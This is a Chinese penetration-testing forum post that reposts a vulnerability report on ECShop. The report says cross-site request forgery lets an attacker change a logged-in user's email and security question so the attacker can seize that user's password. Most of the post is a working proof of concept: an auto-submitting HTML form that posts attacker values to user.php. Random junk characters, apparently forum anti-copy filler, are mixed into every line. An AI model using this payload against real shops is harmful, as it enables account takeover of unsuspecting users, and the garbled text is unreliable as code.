中国网络渗透测试联盟

标题: ecshop修改任意用户密码漏洞的CSRF利用 [打印本页]

作者: admin    时间: 2013-2-20 08:30
标题: ecshop修改任意用户密码漏洞的CSRF利用
简要描述:
3 ~1 H9 _1 Q! d0 B# H* i, f7 X4 \ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现2 V: f% D0 O( i6 s1 _( y- B
3 U1 x! ~# V7 I. N: ]5 t- S
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
! F, Y. I- w4 a
( l! U6 p! p; V1 s# u详细说明:
8 Z% X8 f9 z3 n5 y1 G利用csrf和xss可以突破官方所说的“障碍”5 U( ]$ o4 h: y4 _: v
xss版本已经有人说明% i" j0 f% C  ]) V
这里给出csrf版本
  N' _( u! A- S+ N9 k5 a5 F1 q% K
, f% f8 Q, ?9 ?  r漏洞证明:% ^. b! T% F2 |4 O
<html>
7 G8 R  L1 L# S; S<body>
5 ~7 o5 K, e( I$ d<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
5 _6 t, l) o1 \' J+ v' ]/ S<INPUT TYPE="text" NAME="email" value="hack@wooyun.org"># e9 f2 i' O# S
<INPUT TYPE="text" NAME="act" value="act_edit_profile">: d# e, m' D& v- L, U
<INPUT TYPE="text" NAME="sel_question" value="ecshop">' K0 t2 }1 b0 i! v% C3 C1 _) `4 L* t
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
  l% W. {! q* {$ q+ P</body>/ I! `1 [4 {# @- V
<script>" y$ @) b& M" H5 o
document.forms[0].submit();& {" A8 H3 M3 p
</script>
+ j; O7 X4 `8 P& G</html>* R  c" Z3 E! u9 o. `6 G' l  ^
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
+ s1 H/ y9 T* {; d/ d+ \% X) o9 m$ q- h0 G8 S- ~





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2